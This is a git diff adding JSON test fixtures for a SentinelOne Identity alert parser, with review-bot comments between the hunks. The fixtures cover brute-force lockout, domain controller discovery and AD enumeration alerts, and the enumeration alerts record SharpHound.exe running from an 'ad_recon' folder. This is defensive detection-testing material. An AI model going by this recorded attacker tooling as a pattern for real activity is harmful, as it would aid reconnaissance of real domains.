},\n {\n \"type\": \"route\",\n \"uuid\": \"b05bcbda-d9b1-4bf1-89ae-f4161426251b\"\n },\n {\n \"type\": \"route\",\n \"uuid\": \"a4bc1f9a-cad0-416a-99a0-0202b1ccbe34\"\n },\n {\n \"type\": \"route\",\n \"uuid\": \"654ef4ca-727f-48f6-8561-5a1a73bd80d7\"\n },\n {\n \"type\": \"route\",\n \"uuid\": \"8ac42783-a83d-4f6a-98ff-f76b7660e585\"\n }\n ]\n }\n ],\n \"routes\": [\n {\n \"uuid\": \"b071b344-f505-4b3b-ab48-963913a8f733\",\n \"type\": \"http\",\n \"documentation\": \"Creates new user\",\n \"method\": \"post\",\n \"endpoint\": \"user\",\n \"responses\": [\n {\n \"uuid\": \"0a1cd03e-8140-42cb-a0a3-67e99f44b595\",\n \"body\": \"{}\",\n \"latency\": 0,\n \"statusCode\": 200,\n \"label\": \"\",\n \"headers\": [],\n \"bodyType\": \"DATABUCKET\",\n \"filePath\": \"\",\n \"databucketID\": \"w34k\",\n \"sendFileAsBody\": false,\n \"rules\": [\n {\n \"target\": \"body\",\n \"modifier\": \"$\",\n \"value\": \"CreateUserRequest\",\n \"invert\": false,\n \"operator\": \"valid_json_schema\"\n }\n ],\n \"rulesOperator\": \"AND\",\n \"disableTemplating\": false,\n \"fallbackTo404\": false,\n \"default\": false,\n \"crudKey\": \"id\",\n \"callbacks\": []\n },\n {\n \"uuid\": \"2334411e-b9c5-425e-8bd8-470da7d11077\",\n \"body\": \"{}\",\n \"latency\": 0,\n \"statusCode\": 400,\n \"label\": \"\",\n \"headers\": [],\n \"bodyType\": \"DATABUCKET\",\n \"filePath\": \"\",\n \"databucketID\": \"\",\n \"sendFileAsBody\": false,\n \"rules\": [],\n \"rulesOperator\": \"OR\",\n \"disableTemplating\": false,\n \"fallbackTo404\": false,\n \"default\": true,\n \"crudKey\": \"id\",\n \"callbacks\": []\n }\n ],\n \"responseMode\": null,\n \"streamingMode\": null,\n \"streamingInterval\": 0\n },\n {\n \"uuid\": \"654ef4ca-727f-48f6-8561-5a1a73bd80d7\",\n \"type\": \"http\",\n \"documentation\": \"Logout\",\n \"method\": \"post\",\n \"endpoint\": \"user/logout\",\n \"responses\": [\n {\n \"uuid\": \"8e9bafc8-78e5-4685-88cd-3b90f85edb87\",\n \"body\": \"{}\",\n \"latency\": 0,\n \"statusCode\": 
200,\n \"label\": \"\",\n \"headers\": [],\n \"bodyType\": \"INLINE\",\n \"filePath\": \"\",\n \"databucketID\": \"\",\n \"sendFileAsBody\": false,\n \"rules\": [],\n \"rulesOperator\": \"OR\",\n \"disableTemplating\": false,\n \"fallbackTo404\": false,\n \"default\": true,\n \"crudKey\": \"id\",\n \"callbacks\": []\n }\n ],\n \"responseMode\": null,\n \"streamingMode\": null,\n \"streamingInterval\": 0\n },\n {\n \"uuid\": \"b05bcbda-d9b1-4bf1-89ae-f4161426251b\",\n \"type\": \"http\",\n \"documentation\": \"Authenticate user with credentials\",\n \"method\": \"post\",\n \"endpoint\": \"user/authenticate\",\n \"responses\": [\n {\n \"uuid\": \"91ecae5f-67e0-4264-b724-964d54d7d458\",\n \"body\": \"{}\",\n \"latency\": 0,\n \"statusCode\": 200,\n \"label\": \"\",\n \"headers\": [],\n \"bodyType\": \"DATABUCKET\",\n \"filePath\": \"\",\n \"databucketID\": \"77fk\",\n \"sendFileAsBody\": false,\n \"rules\": [\n {\n \"target\": \"body\",\n \"modifier\": \"$\",\n \"value\": \"AuthenticateUserRequest\",\n \"invert\": false,\n \"operator\": \"valid_json_schema\"\n }\n ],\n \"rulesOperator\": \"OR\",\n \"disableTemplating\": false,\n \"fallbackTo404\": false,\n \"default\": false,\n \"crudKey\": \"id\",\n \"callbacks\": []\n },\n {\n \"uuid\": \"6e78ae1f-c46c-43fc-a96b-6718ec506d26\",\n \"body\": \"{}\",\n \"latency\": 0,\n \"statusCode\": 400,\n \"label\": \"\",\n \"headers\": [],\n \"bodyType\": \"INLINE\",\n \"filePath\": \"\",\n \"databucketID\": \"\",\n \"sendFileAsBody\": false,\n \"rules\": [],\n \"rulesOperator\": \"OR\",\n \"disableTemplating\": false,\n \"fallbackTo404\": false,\n \"default\": true,\n \"crudKey\": \"id\",\n \"callbacks\": []\n }\n ],\n \"responseMode\": null,\n \"streamingMode\": null,\n \"streamingInterval\": 0\n },\n {\n \"uuid\": \"8ac42783-a83d-4f6a-98ff-f76b7660e585\",\n \"type\": \"http\",\n \"documentation\": \"Refresh Session\",\n \"method\": \"post\",\n \"endpoint\": \"user/refresh-session\",\n \"responses\": [\n {\n \"uuid\": 
\"5505a95b-80d0-46cc-b388-9d5afac52102\",\n \"body\": \"{}\",\n \"latency\": 0,\n \"statusCode\": 200,\n \"label\": \"\",\n \"headers\": [],\n \"bodyType\": \"DATABUCKET\",\n \"filePath\": \"\",\n \"databucketID\": \"77fk\",\n \"sendFileAsBody\": false,\n \"rules\": [\n {\n \"target\": \"body\",\n \"modifier\": \"refreshToken\",\n \"value\": \"\",\n \"invert\": true,\n \"operator\": \"null\"\n }\n ],\n \"rulesOperator\": \"OR\",\n \"disableTemplating\": false,\n \"fallbackTo404\": false,\n \"default\": true,\n \"crudKey\": \"id\",\n \"callbacks\": []\n },\n {\n \"uuid\": \"7d54557c-5d32-44c1-92dc-a594615ce7d8\",\n \"body\": \"{}\",\n \"latency\": 0,\n \"statusCode\": 401,\n \"label\": \"\",\n \"headers\": [],\n \"bodyType\": \"INLINE\",\n \"filePath\": \"\",\n \"databucketID\": \"\",\n \"sendFileAsBody\": false,\n \"rules\": [\n {\n \"target\": \"body\",\n \"modifier\": \"refreshToken\",\n \"value\": \"\",\n \"invert\": false,\n \"operator\": \"null\"\n }\n ],\n \"rulesOperator\": \"OR\",\n \"disableTemplating\": false,\n \"fallbackTo404\": false,\n \"default\": false,\n \"crudKey\": \"id\",\n \"callbacks\": []\n }\n ],\n \"responseMode\": null,\n \"streamingMode\": null,\n \"streamingInterval\": 0\n },\n {\n \"uuid\": \"2be5e000-c494-4e86-abfa-7e736ccec3af\",\n \"type\": \"http\",\n \"documentation\": \"Auth required\",\n \"method\": \"all\",\n \"endpoint\": \"*\",\n \"responses\": [\n {\n \"uuid\": \"c49cf55f-b651-4a26-9c10-9806af40c0c4\",\n \"body\": \"{}\",\n \"latency\": 0,\n \"statusCode\": 401,\n \"label\": \"\",\n \"headers\": [],\n \"bodyType\": \"INLINE\",\n \"filePath\": \"\",\n \"databucketID\": \"\",\n \"sendFileAsBody\": false,\n \"rules\": [\n {\n \"target\": \"header\",\n \"modifier\": \"funfy-auth-token\",\n \"value\": \"\",\n \"invert\": false,\n \"operator\": \"null\"\n },\n {\n \"target\": \"path\",\n \"modifier\": \"\",\n \"value\": \"/user\",\n \"invert\": true,\n \"operator\": \"equals\"\n },\n {\n \"target\": \"path\",\n \"modifier\": 
\"\",\n \"value\": \"/user/authenticate\",\n \"invert\": true,\n \"operator\": \"equals\"\n }\n ],\n \"rulesOperator\": \"AND\",\n \"disableTemplating\": false,\n \"fallbackTo404\": false,\n \"default\": true,\n \"crudKey\": \"id\",\n \"callbacks\": []\n }\n ],\n \"responseMode\": \"FALLBACK\",\n \"streamingMode\": null,\n \"streamingInterval\": 0\n },\n {\n \"uuid\": \"a4bc1f9a-cad0-416a-99a0-0202b1ccbe34\",\n \"type\": \"http\",\n \"documentation\": \"RefreshToken is required\",\n \"method\": \"all\",\n \"endpoint\": \"user/*\",\n \"responses\": [\n {\n \"uuid\": \"e5d4e8a4-037e-4e72-b8a3-1e4b9c5da3bd\",\n \"body\": \"{}\",\n \"latency\": 0,\n \"statusCode\": 400,\n \"label\": \"\",\n \"headers\": [],\n \"bodyType\": \"INLINE\",\n \"filePath\": \"\",\n \"databucketID\": \"\",\n \"sendFileAsBody\": false,\n \"rules\": [\n {\n \"target\": \"body\",\n \"modifier\": \"$.refreshToken\",\n \"value\": \"\",\n \"invert\": false,\n \"operator\": \"null\"\n }\n ],\n \"rulesOperator\": \"AND\",\n \"disableTemplating\": false,\n \"fallbackTo404\": false,\n \"default\": true,\n \"crudKey\": \"id\",\n \"callbacks\": []\n }\n ],\n \"responseMode\": \"FALLBACK\",\n \"streamingMode\": null,\n \"streamingInterval\": 0\n },\n {\n \"uuid\": \"dd9329aa-3b68-4907-b069-52d1d1793ca8\",\n \"type\": \"http\",\n \"documentation\": \"\",\n \"method\": \"get\",\n \"endpoint\": \"test\",\n \"responses\": [\n {\n \"uuid\": \"acc619a1-6ec7-45a6-888c-a7a860ed237b\",\n \"body\": \"{\\n \\\"message\\\": \\\"route required auth\\\"\\n}\",\n \"latency\": 0,\n \"statusCode\": 200,\n \"label\": \"\",\n \"headers\": [],\n \"bodyType\": \"INLINE\",\n \"filePath\": \"\",\n \"databucketID\": \"\",\n \"sendFileAsBody\": false,\n \"rules\": [],\n \"rulesOperator\": \"OR\",\n \"disableTemplating\": false,\n \"fallbackTo404\": false,\n \"default\": true,\n \"crudKey\": \"id\",\n \"callbacks\": []\n }\n ],\n \"responseMode\": null,\n \"streamingMode\": null,\n \"streamingInterval\": 0\n }\n ],\n 
\"rootChildren\": [\n {\n \"type\": \"route\",\n \"uuid\": \"2be5e000-c494-4e86-abfa-7e736ccec3af\"\n },\n {\n \"type\": \"folder\",\n \"uuid\": \"b429b3e6-d7b1-4d4f-95fa-6ef0e9125858\"\n },\n {\n \"type\": \"route\",\n \"uuid\": \"dd9329aa-3b68-4907-b069-52d1d1793ca8\"\n }\n ],\n \"proxyMode\": false,\n \"proxyHost\": \"\",\n \"proxyRemovePrefix\": false,\n \"tlsOptions\": {\n \"enabled\": false,\n \"type\": \"CERT\",\n \"pfxPath\": \"\",\n \"certPath\": \"\",\n \"keyPath\": \"\",\n \"caPath\": \"\",\n \"passphrase\": \"\"\n },\n \"cors\": true,\n \"headers\": [\n {\n \"key\": \"Content-Type\",\n \"value\": \"application/json\"\n },\n {\n \"key\": \"Access-Control-Allow-Origin\",\n \"value\": \"*\"\n },\n {\n \"key\": \"Access-Control-Allow-Methods\",\n \"value\": \"GET,POST,PUT,PATCH,DELETE,HEAD,OPTIONS\"\n },\n {\n \"key\": \"Access-Control-Allow-Headers\",\n \"value\": \"Content-Type, Origin, Accept, Authorization, Content-Length, X-Requested-With\"\n }\n ],\n \"proxyReqHeaders\": [\n {\n \"key\": \"\",\n \"value\": \"\"\n }\n ],\n \"proxyResHeaders\": [\n {\n \"key\": \"\",\n \"value\": \"\"\n }\n ],\n \"data\": [\n {\n \"uuid\": \"38fb975d-c6f0-48d9-ae52-9e3fbc5cb654\",\n \"id\": \"8wey\",\n \"name\": \"Globals\",\n \"documentation\": \"\",\n \"value\": \"\"\n },\n {\n \"uuid\": \"2372a308-c890-479c-a18b-54abe4696967\",\n \"id\": \"zzay\",\n \"name\": \"ISODate\",\n \"documentation\": \"Datetime shared format comes from backend\",\n \"value\": \"\\\"{{now 'yyyy-MM-dd\\\\'T\\\\'HH:mm:ss\\\\'Z\\\\''}}\\\"\"\n },\n {\n \"uuid\": \"160c80f4-39c7-494d-a489-06da2e51aa87\",\n \"id\": \"g4qq\",\n \"name\": \"CreateUserRequest\",\n \"documentation\": \"\",\n \"value\": \"{\\n \\\"type\\\": \\\"object\\\",\\n \\\"properties\\\": {\\n \\\"email\\\": { \\\"type\\\": \\\"string\\\" },\\n \\\"phone\\\": { \\\"type\\\": \\\"string\\\" },\\n \\\"password\\\": { \\\"type\\\": \\\"string\\\" }\\n },\\n \\\"required\\\": [\\\"phone\\\", \\\"password\\\"]\\n}\\n\"\n },\n {\n 
\"uuid\": \"c1d673ba-f7cf-4fd2-8cc8-449017a3ff17\",\n \"id\": \"ofz6\",\n \"name\": \"AuthenticateUserRequest\",\n \"documentation\": \"\",\n \"value\": \"{\\n \\\"type\\\": \\\"object\\\",\\n \\\"properties\\\": {\\n \\\"phone\\\": { \\\"type\\\": \\\"string\\\" },\\n \\\"password\\\": { \\\"type\\\": \\\"string\\\" }\\n },\\n \\\"required\\\": [\\\"phone\\\", \\\"password\\\"]\\n}\\n\"\n },\n {\n \"uuid\": \"2844853c-c892-4671-9201-0b252711a36b\",\n \"id\": \"w34k\",\n \"name\": \"User\",\n \"documentation\": \"\",\n \"value\": \"{\\n \\\"id\\\": \\\"{{faker 'string.uuid'}}\\\",\\n \\\"email\\\": \\\"{{faker 'internet.email'}}\\\",\\n \\\"phone\\\": \\\"{{faker 'phone.number' style='international'}}\\\",\\n \\\"createdAt\\\": \\\"{{data 'ISODate'}}\\\",\\n \\\"updatedAt\\\": \\\"{{data 'ISODate'}}\\\",\\n}\"\n },\n {\n \"uuid\": \"e698b979-5934-45f2-8612-5782a8b1e0be\",\n \"id\": \"77fk\",\n \"name\": \"Authentication\",\n \"documentation\": \"\",\n \"value\": \"{\\n \\\"refreshToken\\\": \\\"{{faker 'string.uuid'}}\\\",\\n \\\"accessToken\\\": \\\"{{faker 'string.uuid'}}\\\"\\n}\"\n }\n ],\n \"callbacks\": []\n}", + "event": { + "category": "intrusion_detection", + "kind": "alert", + "type": "info" + }, + "observer": { + "product": "Singularity Identity", + "vendor": "SentinelOne" + }, + "sentinelone": { + "identity": { + "name": "Mocked api" + } + } + } +} diff --git a/SentinelOne/identity/tests/test_alert_3.json b/SentinelOne/identity/tests/test_alert_3.json new file mode 100644 index 000000000..cbc475032 --- /dev/null +++ b/SentinelOne/identity/tests/test_alert_3.json 
@@ -0,0 +1,34 @@
+{
+ "input": {
+ "message": "{\"id\": \"01935359-3eda-7903-93fc-af6a0e5d0a8f\", \"name\": \"Brute force attack - Mass Account Lockout\", \"description\": \"This event is raised when ADAssessor detects lockout of multiple accounts, which could be due to brute-force attempts or a password spray.\", \"detectedAt\": \"2024-11-22T10:09:37.779Z\", \"attackSurfaces\": [\"IDENTITY\"], \"detectionSource\": {\"product\": \"Identity\"}, \"status\": \"NEW\", \"assignee\": null, \"classification\": \"UNKNOWN\", \"confidenceLevel\": \"MALICIOUS\", \"firstSeenAt\": \"2024-11-22T10:09:37.779Z\", \"lastSeenAt\": \"2024-11-22T10:09:37.779Z\", \"process\": null, \"result\": null, \"storylineId\": null}"
+ },
+ "expected": {
+ "message": "{\"id\": \"01935359-3eda-7903-93fc-af6a0e5d0a8f\", \"name\": \"Brute force attack - Mass Account Lockout\", \"description\": \"This event is raised when ADAssessor detects lockout of multiple accounts, which could be due to brute-force attempts or a password spray.\", \"detectedAt\": \"2024-11-22T10:09:37.779Z\", \"attackSurfaces\": [\"IDENTITY\"], \"detectionSource\": {\"product\": \"Identity\"}, \"status\": \"NEW\", \"assignee\": null, \"classification\": \"UNKNOWN\", \"confidenceLevel\": \"MALICIOUS\", \"firstSeenAt\": \"2024-11-22T10:09:37.779Z\", \"lastSeenAt\": \"2024-11-22T10:09:37.779Z\", \"process\": null, \"result\": null, \"storylineId\": null}",
+ "event": {
+ "category": "intrusion_detection",
+ "end": "2024-11-22T10:09:37.779000Z",
+ "kind": "alert",
+ "provider": "Identity",
+ "reason": "This event is raised when ADAssessor detects lockout of multiple accounts, which could be due to brute-force attempts or a password spray.",
+ "start": "2024-11-22T10:09:37.779000Z",
+ "type": "info"
+ },
+ "@timestamp": "2024-11-22T10:09:37.779000Z",
+ "observer": {
+ "product": "Singularity Identity",
+ "vendor": "SentinelOne"
+ },
+ "sentinelone": {
+ "identity": {
+ "attackSurfaces": [
+ "IDENTITY"
+ ],
+ "classification": "UNKNOWN",
+ "confidenceLevel": "MALICIOUS",
+ "id": "01935359-3eda-7903-93fc-af6a0e5d0a8f",
+ "name": "Brute force attack - Mass Account Lockout",
+ "status": "NEW"
+ }
+ }
+ }
+}
\ No newline at end of file
diff --git a/SentinelOne/identity/tests/test_alert_4.json b/SentinelOne/identity/tests/test_alert_4.json
new file mode 100644
index 000000000..64efcfc10
--- /dev/null
+++ b/SentinelOne/identity/tests/test_alert_4.json
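Review bot: None of the new fixtures (test_alert_3 through test_alert_9) carries a non-null `storylineId`, so the one key the parser reads under a different spelling is never exercised: every input message spells it `storylineId`, while the parser line visible in the later "Apply linter" hunk reads `json_event.message.storyLineId`, which as written would leave `sentinelone.identity.storyLineId` empty on real events. A fixture whose input sets `"storylineId": "<constructed-storyline-id>"` and expects the matching `sentinelone.identity.storyLineId` value would catch this, and the same gap applies to `result`, which is null in all of them. Expected timestamps also come out in two shapes — `2024-11-22T10:09:37.779000Z` here and in test_alert_4, 8 and 9 versus `2024-11-22T09:54:58Z` in test_alert_5, 6 and 7 — which appears to follow how the parser renders fractional seconds and is worth pinning to one form if downstream comparisons are string-based. Each of these files is also added without a trailing newline.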
@@ -0,0 +1,34 @@
+{
+ "input": {
+ "message": "{\"id\": \"01935358-ee81-7eb7-b57f-022c6f0019a9\", \"name\": \"Brute force attack - Mass Account Lockout\", \"description\": \"This event is raised when ADAssessor detects lockout of multiple accounts, which could be due to brute-force attempts or a password spray.\", \"detectedAt\": \"2024-11-22T10:09:17.184Z\", \"attackSurfaces\": [\"IDENTITY\"], \"detectionSource\": {\"product\": \"Identity\"}, \"status\": \"NEW\", \"assignee\": null, \"classification\": \"UNKNOWN\", \"confidenceLevel\": \"MALICIOUS\", \"firstSeenAt\": \"2024-11-22T10:09:17.184Z\", \"lastSeenAt\": \"2024-11-22T10:09:17.184Z\", \"process\": null, \"result\": null, \"storylineId\": null}"
+ },
+ "expected": {
+ "message": "{\"id\": \"01935358-ee81-7eb7-b57f-022c6f0019a9\", \"name\": \"Brute force attack - Mass Account Lockout\", \"description\": \"This event is raised when ADAssessor detects lockout of multiple accounts, which could be due to brute-force attempts or a password spray.\", \"detectedAt\": \"2024-11-22T10:09:17.184Z\", \"attackSurfaces\": [\"IDENTITY\"], \"detectionSource\": {\"product\": \"Identity\"}, \"status\": \"NEW\", \"assignee\": null, \"classification\": \"UNKNOWN\", \"confidenceLevel\": \"MALICIOUS\", \"firstSeenAt\": \"2024-11-22T10:09:17.184Z\", \"lastSeenAt\": \"2024-11-22T10:09:17.184Z\", \"process\": null, \"result\": null, \"storylineId\": null}",
+ "event": {
+ "category": "intrusion_detection",
+ "end": "2024-11-22T10:09:17.184000Z",
+ "kind": "alert",
+ "provider": "Identity",
+ "reason": "This event is raised when ADAssessor detects lockout of multiple accounts, which could be due to brute-force attempts or a password spray.",
+ "start": "2024-11-22T10:09:17.184000Z",
+ "type": "info"
+ },
+ "@timestamp": "2024-11-22T10:09:17.184000Z",
+ "observer": {
+ "product": "Singularity Identity",
+ "vendor": "SentinelOne"
+ },
+ "sentinelone": {
+ "identity": {
+ "attackSurfaces": [
+ "IDENTITY"
+ ],
+ "classification": "UNKNOWN",
+ "confidenceLevel": "MALICIOUS",
+ "id": "01935358-ee81-7eb7-b57f-022c6f0019a9",
+ "name": "Brute force attack - Mass Account Lockout",
+ "status": "NEW"
+ }
+ }
+ }
+}
\ No newline at end of file
diff --git a/SentinelOne/identity/tests/test_alert_5.json b/SentinelOne/identity/tests/test_alert_5.json
new file mode 100644
index 000000000..f1339df60
--- /dev/null
+++ b/SentinelOne/identity/tests/test_alert_5.json
@@ -0,0 +1,49 @@
+{
+ "input": {
+ "message": "{\"id\": \"0193534d-63c1-7497-b854-b883425af3f5\", \"name\": \"Domain Controller Discovery Detected\", \"description\": \"This event is raised when there is a query from an endpoint to find the domain controllers or AD Servers in the Active Directory Domain.\", \"detectedAt\": \"2024-11-22T09:54:58.000Z\", \"attackSurfaces\": [\"IDENTITY\"], \"detectionSource\": {\"product\": \"Identity\"}, \"status\": \"NEW\", \"assignee\": null, \"classification\": \"ENUMERATION\", \"confidenceLevel\": \"MALICIOUS\", \"firstSeenAt\": \"2024-11-22T09:54:58.000Z\", \"lastSeenAt\": \"2024-11-22T09:54:58.000Z\", \"process\": {\"cmdLine\": \"\\\"C:\\\\Windows\\\\system32\\\\cmd.exe\\\"\", \"file\": {\"path\": \"c:\\\\windows\\\\system32\\\\cmd.exe\", \"sha1\": null, \"sha256\": \"4D89FC34D5F0F9BABD022271C585A9477BF41E834E46B991DEAA0530FDB25E22\", \"md5\": null}, \"parentName\": null}, \"result\": null, \"storylineId\": null}"
+ },
+ "expected": {
+ "message": "{\"id\": \"0193534d-63c1-7497-b854-b883425af3f5\", \"name\": \"Domain Controller Discovery Detected\", \"description\": \"This event is raised when there is a query from an endpoint to find the domain controllers or AD Servers in the Active Directory Domain.\", \"detectedAt\": \"2024-11-22T09:54:58.000Z\", \"attackSurfaces\": [\"IDENTITY\"], \"detectionSource\": {\"product\": \"Identity\"}, \"status\": \"NEW\", \"assignee\": null, \"classification\": \"ENUMERATION\", \"confidenceLevel\": \"MALICIOUS\", \"firstSeenAt\": \"2024-11-22T09:54:58.000Z\", \"lastSeenAt\": \"2024-11-22T09:54:58.000Z\", \"process\": {\"cmdLine\": \"\\\"C:\\\\Windows\\\\system32\\\\cmd.exe\\\"\", \"file\": {\"path\": \"c:\\\\windows\\\\system32\\\\cmd.exe\", \"sha1\": null, \"sha256\": \"4D89FC34D5F0F9BABD022271C585A9477BF41E834E46B991DEAA0530FDB25E22\", \"md5\": null}, \"parentName\": null}, \"result\": null, \"storylineId\": null}",
+ "event": {
+ "category": "intrusion_detection",
+ "end": "2024-11-22T09:54:58Z",
+ "kind": "alert",
+ "provider": "Identity",
+ "reason": "This event is raised when there is a query from an endpoint to find the domain controllers or AD Servers in the Active Directory Domain.",
+ "start": "2024-11-22T09:54:58Z",
+ "type": "info"
+ },
+ "@timestamp": "2024-11-22T09:54:58Z",
+ "file": {
+ "hash": {
+ "sha256": "4D89FC34D5F0F9BABD022271C585A9477BF41E834E46B991DEAA0530FDB25E22"
+ },
+ "name": "cmd.exe",
+ "path": "c:\\windows\\system32\\cmd.exe"
+ },
+ "observer": {
+ "product": "Singularity Identity",
+ "vendor": "SentinelOne"
+ },
+ "process": {
+ "command_line": "\"C:\\Windows\\system32\\cmd.exe\""
+ },
+ "related": {
+ "hash": [
+ "4D89FC34D5F0F9BABD022271C585A9477BF41E834E46B991DEAA0530FDB25E22"
+ ]
+ },
+ "sentinelone": {
+ "identity": {
+ "attackSurfaces": [
+ "IDENTITY"
+ ],
+ "classification": "ENUMERATION",
+ "confidenceLevel": "MALICIOUS",
+ "id": "0193534d-63c1-7497-b854-b883425af3f5",
+ "name": "Domain Controller Discovery Detected",
+ "status": "NEW"
+ }
+ }
+ }
+}
\ No newline at end of file
diff --git a/SentinelOne/identity/tests/test_alert_6.json b/SentinelOne/identity/tests/test_alert_6.json
new file mode 100644
index 000000000..e43c64e20
--- /dev/null
+++ b/SentinelOne/identity/tests/test_alert_6.json
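Review bot: The expected `file.hash.sha256` and `related.hash` values keep the vendor's uppercase hex (`4D89FC…`), and test_alert_6 and test_alert_7 do the same with `61F897…`; ECS hash fields are conventionally lowercase, and a case difference is enough to miss an exact-match lookup against an indicator list or a join with hashes from another source, so lowercasing in the parser (a `| lower` filter on the value) and updating these three fixtures would be the safer contract. The expected output also asserts no `process.name` or `process.executable`, although the input's `process.file.path` and `cmdLine` provide both; if the parser does not already set them, these fixtures are the place to pin that. `file.name` is asserted as `cmd.exe`, so the path is already being split somewhere in the parser body, which is outside the visible hunks.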
@@ -0,0 +1,49 @@
+{
+ "input": {
+ "message": "{\"id\": \"01935347-abf7-7457-8467-e3443470e6f3\", \"name\": \"AD Domain Computer Enumeration Detected\", \"description\": \"This event is raised when there is a query from an endpoint to dump all the computers in the Active Directory Domain.\", \"detectedAt\": \"2024-11-22T09:45:51.000Z\", \"attackSurfaces\": [\"IDENTITY\"], \"detectionSource\": {\"product\": \"Identity\"}, \"status\": \"NEW\", \"assignee\": null, \"classification\": \"ENUMERATION\", \"confidenceLevel\": \"MALICIOUS\", \"firstSeenAt\": \"2024-11-22T09:45:51.000Z\", \"lastSeenAt\": \"2024-11-22T09:45:51.000Z\", \"process\": {\"cmdLine\": \"Sharphound.exe\", \"file\": {\"path\": \"c:\\\\users\\\\administrator\\\\desktop\\\\ad_recon\\\\sharphound.exe\", \"sha1\": null, \"sha256\": \"61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863\", \"md5\": null}, \"parentName\": null}, \"result\": null, \"storylineId\": null}"
+ },
+ "expected": {
+ "message": "{\"id\": \"01935347-abf7-7457-8467-e3443470e6f3\", \"name\": \"AD Domain Computer Enumeration Detected\", \"description\": \"This event is raised when there is a query from an endpoint to dump all the computers in the Active Directory Domain.\", \"detectedAt\": \"2024-11-22T09:45:51.000Z\", \"attackSurfaces\": [\"IDENTITY\"], \"detectionSource\": {\"product\": \"Identity\"}, \"status\": \"NEW\", \"assignee\": null, \"classification\": \"ENUMERATION\", \"confidenceLevel\": \"MALICIOUS\", \"firstSeenAt\": \"2024-11-22T09:45:51.000Z\", \"lastSeenAt\": \"2024-11-22T09:45:51.000Z\", \"process\": {\"cmdLine\": \"Sharphound.exe\", \"file\": {\"path\": \"c:\\\\users\\\\administrator\\\\desktop\\\\ad_recon\\\\sharphound.exe\", \"sha1\": null, \"sha256\": \"61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863\", \"md5\": null}, \"parentName\": null}, \"result\": null, \"storylineId\": null}",
+ "event": {
+ "category": "intrusion_detection",
+ "end": "2024-11-22T09:45:51Z",
+ "kind": "alert",
+ "provider": "Identity",
+ "reason": "This event is raised when there is a query from an endpoint to dump all the computers in the Active Directory Domain.",
+ "start": "2024-11-22T09:45:51Z",
+ "type": "info"
+ },
+ "@timestamp": "2024-11-22T09:45:51Z",
+ "file": {
+ "hash": {
+ "sha256": "61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863"
+ },
+ "name": "sharphound.exe",
+ "path": "c:\\users\\administrator\\desktop\\ad_recon\\sharphound.exe"
+ },
+ "observer": {
+ "product": "Singularity Identity",
+ "vendor": "SentinelOne"
+ },
+ "process": {
+ "command_line": "Sharphound.exe"
+ },
+ "related": {
+ "hash": [
+ "61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863"
+ ]
+ },
+ "sentinelone": {
+ "identity": {
+ "attackSurfaces": [
+ "IDENTITY"
+ ],
+ "classification": "ENUMERATION",
+ "confidenceLevel": "MALICIOUS",
+ "id": "01935347-abf7-7457-8467-e3443470e6f3",
+ "name": "AD Domain Computer Enumeration Detected",
+ "status": "NEW"
+ }
+ }
+ }
+}
\ No newline at end of file
diff --git a/SentinelOne/identity/tests/test_alert_7.json b/SentinelOne/identity/tests/test_alert_7.json
new file mode 100644
index 000000000..d4acce26a
--- /dev/null
+++ b/SentinelOne/identity/tests/test_alert_7.json
@@ -0,0 +1,49 @@
+{
+ "input": {
+ "message": "{\"id\": \"01935347-b05a-7d28-a929-5294ee16628a\", \"name\": \"Domain Controller Discovery Detected\", \"description\": \"This event is raised when there is a query from an endpoint to find the domain controllers or AD Servers in the Active Directory Domain.\", \"detectedAt\": \"2024-11-22T09:45:51.000Z\", \"attackSurfaces\": [\"IDENTITY\"], \"detectionSource\": {\"product\": \"Identity\"}, \"status\": \"NEW\", \"assignee\": null, \"classification\": \"ENUMERATION\", \"confidenceLevel\": \"MALICIOUS\", \"firstSeenAt\": \"2024-11-22T09:45:51.000Z\", \"lastSeenAt\": \"2024-11-22T09:45:51.000Z\", \"process\": {\"cmdLine\": \"Sharphound.exe\", \"file\": {\"path\": \"c:\\\\users\\\\administrator\\\\desktop\\\\ad_recon\\\\sharphound.exe\", \"sha1\": null, \"sha256\": \"61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863\", \"md5\": null}, \"parentName\": null}, \"result\": null, \"storylineId\": null}"
+ },
+ "expected": {
+ "message": "{\"id\": \"01935347-b05a-7d28-a929-5294ee16628a\", \"name\": \"Domain Controller Discovery Detected\", \"description\": \"This event is raised when there is a query from an endpoint to find the domain controllers or AD Servers in the Active Directory Domain.\", \"detectedAt\": \"2024-11-22T09:45:51.000Z\", \"attackSurfaces\": [\"IDENTITY\"], \"detectionSource\": {\"product\": \"Identity\"}, \"status\": \"NEW\", \"assignee\": null, \"classification\": \"ENUMERATION\", \"confidenceLevel\": \"MALICIOUS\", \"firstSeenAt\": \"2024-11-22T09:45:51.000Z\", \"lastSeenAt\": \"2024-11-22T09:45:51.000Z\", \"process\": {\"cmdLine\": \"Sharphound.exe\", \"file\": {\"path\": \"c:\\\\users\\\\administrator\\\\desktop\\\\ad_recon\\\\sharphound.exe\", \"sha1\": null, \"sha256\": \"61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863\", \"md5\": null}, \"parentName\": null}, \"result\": null, \"storylineId\": null}",
+ "event": {
+ "category": "intrusion_detection",
+ "end": "2024-11-22T09:45:51Z",
+ "kind": "alert",
+ "provider": "Identity",
+ "reason": "This event is raised when there is a query from an endpoint to find the domain controllers or AD Servers in the Active Directory Domain.",
+ "start": "2024-11-22T09:45:51Z",
+ "type": "info"
+ },
+ "@timestamp": "2024-11-22T09:45:51Z",
+ "file": {
+ "hash": {
+ "sha256": "61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863"
+ },
+ "name": "sharphound.exe",
+ "path": "c:\\users\\administrator\\desktop\\ad_recon\\sharphound.exe"
+ },
+ "observer": {
+ "product": "Singularity Identity",
+ "vendor": "SentinelOne"
+ },
+ "process": {
+ "command_line": "Sharphound.exe"
+ },
+ "related": {
+ "hash": [
+ "61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863"
+ ]
+ },
+ "sentinelone": {
+ "identity": {
+ "attackSurfaces": [
+ "IDENTITY"
+ ],
+ "classification": "ENUMERATION",
+ "confidenceLevel": "MALICIOUS",
+ "id": "01935347-b05a-7d28-a929-5294ee16628a",
